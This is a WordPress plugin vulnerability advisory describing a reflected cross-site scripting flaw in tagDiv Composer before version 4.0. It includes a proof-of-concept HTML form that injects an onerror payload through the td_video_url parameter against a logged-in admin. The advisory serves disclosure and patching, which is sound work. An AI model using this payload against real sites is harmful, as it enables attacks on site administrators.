WordPress Plugin Vulnerabilities

tagDiv Composer < 4.0 - Reflected Cross-site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="td_ajax_video_modal">
    <input type="text" name="td_video_url" value='" onerror=alert(`XSS`) mov'>
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

Fixed in 4.0

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-04-24 (about 1 years ago)
Added
2023-04-24 (about 1 years ago)
Last Updated
2023-04-24 (about 1 years ago)

Other